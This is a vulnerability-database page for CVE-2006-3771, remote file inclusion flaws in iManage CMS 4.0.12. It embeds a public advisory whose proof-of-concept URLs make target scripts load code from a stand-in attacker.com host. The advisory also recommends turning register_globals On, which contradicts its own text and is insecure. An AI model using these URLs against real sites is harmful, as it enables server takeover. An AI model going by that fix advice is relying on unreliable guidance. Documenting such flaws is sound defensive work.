CVE-2006-3771
CVSS7.5
发布时间 :2006-07-24 08:19:00
修订时间 :2008-09-10 16:24:44
NMCOE    

[原文]Multiple PHP remote file inclusion vulnerabilities in component.php in iManage CMS 4.0.12 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the absolute_path parameter to (1) articles.php, (2) contact.php, (3) displaypage.php, (4) faq.php, (5) mainbody.php, (6) news.php, (7) registration.php, (8) whosOnline.php, (9) components/com_calendar.php, (10) components/com_forum.php, (11) components/minibb/index.php, (12) components/minibb/bb_admin.php, (13) components/minibb/bb_plugins.php, (14) modules/mod_calendar.php, (15) modules/mod_browser_prefs.php, (16) modules/mod_counter.php, (17) modules/mod_online.php, (18) modules/mod_stats.php, (19) modules/mod_weather.php, (20) themes/bizz.php, (21) themes/default.php, (22) themes/simple.php, (23) themes/original.php, (24) themes/portal.php, (25) themes/purple.php, and other unspecified files.


[CNNVD] iManage CMS 'component.php'多个PHP远程文件包含漏洞(CNNVD-200607-375)

         iManage CMS 4.0.12及之前版本中的component.php存在多个PHP远程文件包含漏洞。 远程攻击者可以借助对(1) articles.php, (2) contact.php, (3) displaypage.php, (4) faq.php, (5) mainbody.php, (6) news.php, (7) registration.php, (8) whosOnline.php, (9) components/com_calendar.php, (10) components/com_forum.php, (11) components/minibb/index.php, (12) components/minibb/bb_admin.php, (13) components/minibb/bb_plugins.php, (14) modules/mod_calendar.php, (15) modules/mod_browser_prefs.php, (16) modules/mod_counter.php, (17) modules/mod_online.php, (18) modules/mod_stats.php, (19) modules/mod_weather.php, (20) themes/bizz.php, (21) themes/default.php, (22) themes/simple.php, (23) themes/original.php, (24) themes/portal.php, (25) themes/purple.php以及其他未明文件的absolute_path参数中的URL,执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3771
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3771
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-375
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/19090
(UNKNOWN)  BID  19090
http://www.securityfocus.com/archive/1/archive/1/440642/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060720 [ECHO_ADV_40$2006] iManage CMS <= 4.0.12 (absolute_path) Remote File Inclusion
http://advisories.echo.or.id/adv/adv40-matdhule-2006.txt
(UNKNOWN)  MISC  http://advisories.echo.or.id/adv/adv40-matdhule-2006.txt
http://xforce.iss.net/xforce/xfdb/27875
(UNKNOWN)  XF  imanagecms-absolutepath-file-include(27875)
http://www.osvdb.org/28671
(UNKNOWN)  OSVDB  28671
http://www.osvdb.org/28670
(UNKNOWN)  OSVDB  28670
http://www.osvdb.org/28669
(UNKNOWN)  OSVDB  28669
http://www.osvdb.org/28668
(UNKNOWN)  OSVDB  28668
http://www.osvdb.org/28667
(UNKNOWN)  OSVDB  28667
http://www.osvdb.org/28666
(UNKNOWN)  OSVDB  28666
http://www.osvdb.org/28665
(UNKNOWN)  OSVDB  28665
http://www.osvdb.org/28664
(UNKNOWN)  OSVDB  28664
http://www.osvdb.org/28663
(UNKNOWN)  OSVDB  28663
http://www.osvdb.org/28662
(UNKNOWN)  OSVDB  28662
http://www.osvdb.org/28661
(UNKNOWN)  OSVDB  28661
http://www.osvdb.org/28660
(UNKNOWN)  OSVDB  28660
http://www.osvdb.org/28659
(UNKNOWN)  OSVDB  28659
http://www.osvdb.org/28658
(UNKNOWN)  OSVDB  28658
http://www.osvdb.org/28657
(UNKNOWN)  OSVDB  28657
http://www.osvdb.org/28656
(UNKNOWN)  OSVDB  28656
http://www.osvdb.org/28655
(UNKNOWN)  OSVDB  28655
http://www.osvdb.org/28654
(UNKNOWN)  OSVDB  28654
http://www.osvdb.org/28653
(UNKNOWN)  OSVDB  28653
http://www.osvdb.org/28652
(UNKNOWN)  OSVDB  28652
http://www.osvdb.org/28651
(UNKNOWN)  OSVDB  28651
http://www.osvdb.org/28650
(UNKNOWN)  OSVDB  28650
http://www.osvdb.org/28649
(UNKNOWN)  OSVDB  28649
http://www.osvdb.org/28648
(UNKNOWN)  OSVDB  28648
http://www.osvdb.org/28647
(UNKNOWN)  OSVDB  28647
http://securitytracker.com/id?1016551
(UNKNOWN)  SECTRACK  1016551
http://securityreason.com/securityalert/1265
(UNKNOWN)  SREASON  1265
http://milw0rm.com/exploits/2046
(UNKNOWN)  MILW0RM  2046

- 漏洞信息

iManage CMS 'component.php'多个PHP远程文件包含漏洞
高危 输入验证
2006-07-24 00:00:00 2006-08-07 00:00:00
远程  
         iManage CMS 4.0.12及之前版本中的component.php存在多个PHP远程文件包含漏洞。 远程攻击者可以借助对(1) articles.php, (2) contact.php, (3) displaypage.php, (4) faq.php, (5) mainbody.php, (6) news.php, (7) registration.php, (8) whosOnline.php, (9) components/com_calendar.php, (10) components/com_forum.php, (11) components/minibb/index.php, (12) components/minibb/bb_admin.php, (13) components/minibb/bb_plugins.php, (14) modules/mod_calendar.php, (15) modules/mod_browser_prefs.php, (16) modules/mod_counter.php, (17) modules/mod_online.php, (18) modules/mod_stats.php, (19) modules/mod_weather.php, (20) themes/bizz.php, (21) themes/default.php, (22) themes/simple.php, (23) themes/original.php, (24) themes/portal.php, (25) themes/purple.php以及其他未明文件的absolute_path参数中的URL,执行任意PHP代码。

- 公告与补丁

        暂无数据

- 漏洞信息 (2046)

iManage CMS <= 4.0.12 (absolute_path) Remote File Inclusion (EDBID:2046)
php webapps
2006-07-20 Verified
0 Matdhule
N/A [点击下载]
____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \
 |    __)_ /    \  \//    ~    \/   |   \
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/                              .OR.ID
ECHO_ADV_40$2006

---------------------------------------------------------------------------------------------------
[ECHO_ADV_40$2006] iManage CMS <= 4.0.12 (absolute_path) Remote File Inclusion
---------------------------------------------------------------------------------------------------

Author          : Ahmad Maulana a.k.a Matdhule
Date Found      : July, 20th 2006
Location        : Indonesia, Jakarta
web             : http://advisories.echo.or.id/adv/adv40-matdhule-2006.txt
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
iManage CMS from Imaginex-Resource

Application     : iManage CMS
version         : 4.0.12 stable
URL             : http://www.imaginex-resource.com

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~

-----------------------component.php----------------------
....
<?php
/**
*    iManage Version 4.0.12
*    Dynamic portal server and Content managment engine
*    03-02-2003
*
*    Copyright (C) 2000 - 2003 Imaginex-Resource
*
*    Site Name: iManage Version 4.0.12
*    File Name: rightComponent.php
*    Date: 31/01/2003
*     Version #: 4.0.12
*    Comments: Display all modules which are to be displayed on the right.
**/

include($absolute_path.'/language/'.$lang.'/lang_components.php');
...
----------------------------------------------------------

Input passed to the "absolute_path" parameter in component.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources

Affected files: 

articles.php
contact.php
displaypage.php
faq.php
mainbody.php
news.php
registration.php
whosOnline.php
components/com_calendar.php
components/com_forum.php
components/minibb/index.php
components/minibb/bb_admin.php
components/minibb/bb_plugins.php
modules/mod_calendar.php
modules/mod_browser_prefs.php
modules/mod_counter.php
modules/mod_online.php
modules/mod_stats.php
modules/mod_weather.php
themes/bizz.php
themes/default.php
themes/simple.php
themes/original.php
themes/portal.php
themes/purple.php

and more :)

Successful exploitation requires that "register_globals= Off ".

Proof Of Concept:
~~~~~~~~~~~~~

http://target.com/[path]/articles.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/contact.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/displaypage.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/faq.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/mainbody.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/news.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/registration.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/whosOnline.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/components/com_calendar.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/components/com_forum.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/components/minibb/index.php?absolute_path=http://attacker.com//inject.txt?
http://target.com/[path]/modules/mod_calendar.php?absolute_path=http://attacker.com//inject.txt?

and more Affected files


Solution:
~~~~~
- Change register_globals= On 
  in php.ini
- Sanitize variable $absolute_path on affected files.

---------------------------------------------------------------------------
Shoutz:
~
~ solpot a.k.a chris, J4mbi  H4ck3r for the hacking lesson  :) 
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama
~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com
~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~
 
     matdhule[at]gmail[dot]com
     
-------------------------------- [ EOF ]----------------------------------

# milw0rm.com [2006-07-20]
		

- 漏洞信息

28647
iManage CMS themes/default.php absolute_path Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

iManage CMS contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the themes/default.php script not properly sanitizing user input supplied to the 'absolute_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-07-20 Unknow
2006-07-20 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站